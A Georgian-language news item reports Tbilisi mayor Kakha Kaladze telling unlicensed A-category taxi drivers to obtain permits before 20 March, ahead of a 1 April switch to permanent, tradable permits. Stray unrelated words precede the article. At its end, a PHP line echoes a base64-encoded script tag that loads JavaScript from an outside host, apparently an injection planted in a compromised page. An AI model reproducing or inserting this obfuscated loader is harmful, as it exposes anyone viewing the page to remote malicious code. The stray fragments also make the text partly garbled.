celsiusi
ავერსი შნაიდერი

 კიდევ ერთხელ მივმართავ იმ მძღოლებს, რომლებიც დღეს ახორციელებენ A კატეგორიის სერვისს, მაგრამ არ აქვთ შესაბამისი ნებართვა, 20 მარტამდე მიმართეთ ჩვენს უწყებას და აიღეთ  ლიცენზიები, წინააღმდეგ შემთხვევაში, პირველი აპრილიდან ვერ მიიღებთ სამუდამო ნებართვას და ვერ გააგრძელებთ საქმიანობას, – ამის შესახებ დედაქალაქის მერმა, კახა კალაძემ თბილისის მთავრობის სხდომაზე განაცხადა.

როგორც კახა კალაძემ აღნიშნა, პარალელურად, გაიზრდება ჯარიმები და მძღოლები, რომლებიც უნებართვოდ გააგრძელებენ საქმიანობას, დაჯარიმდებიან.

„ჩვენ ბევრი ვისაუბრეთ ტაქსების რეფორმაზე, განსახორციელებელ ცვლილებებზე, გადადგმულ ნაბიჯებზე. 20 მარტიდან შეწყდება ძველი სისტემით A კატეგორიის ნებართვების გაცემა და პირველი აპრილიდან ახალი, განსხვავებული მოდელი ამოქმედდება. პირველ აპრილს ერთჯერადად და საბოლოოდ დარიგდება უვადო ნებართვები, რომელთა გაყიდვას, ყიდვას, იჯარით გაცემას თავად შეძლებენ ნებართვის მფლობელები და თბილისის მერია ნებართვებს აღარ გასცემს. ეს იქნება მათ სამუდამო საკუთრებაში. ისინი ერთ დღესაც თუ გადაწყვეტენ, რომ აღნიშნული ნებართვა გაყიდონ, ექნებათ ამის შესაძლებლობა შესაბამის პლატფორმაზე. იქვე შეძლებენ ამის თუნდაც გაიჯარებას, თუნდაც გაყიდვას. ვინაიდან ნებართვის გაცემის შესაძლებლობა ამით ამოიწურება, კიდევ ერთხელ მოვუწოდებ, აიღონ ძველი სისტემით გათვალისწინებული A კატეგორიის ნებართვები, წინააღმდეგ შემთხვევაში ეს ადამიანები პირველი აპრილიდან ვეღარ შეძლებენ იმ ნებართვების აღებას, რომლებიც სამუდამო საკუთრებაში გადადის. ვაფრთხილებ ამ ადამიანებს, შემდეგ არ დაიწყონ, რომ არ ვიცოდი, არ გვქონდა ინფორმაცია. ყველანაირ შესაძლებლობას ვიყენებთ, გვაქვს დაბეჭდილი შესაბამისი ბუკლეტები, ურიგდებათ ტაქსის მძღოლებს, მთავრობის ყველა სხდომას ვიყენებ, რათა მოგაწოდოთ ეს ინფორმაცია, რომ შემდეგ არ აღმოჩნდეთ გაუგებრობაში. გამოიყენეთ ეს შესაძლებლობა“, – განაცხადა კახა კალაძემ.

388
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");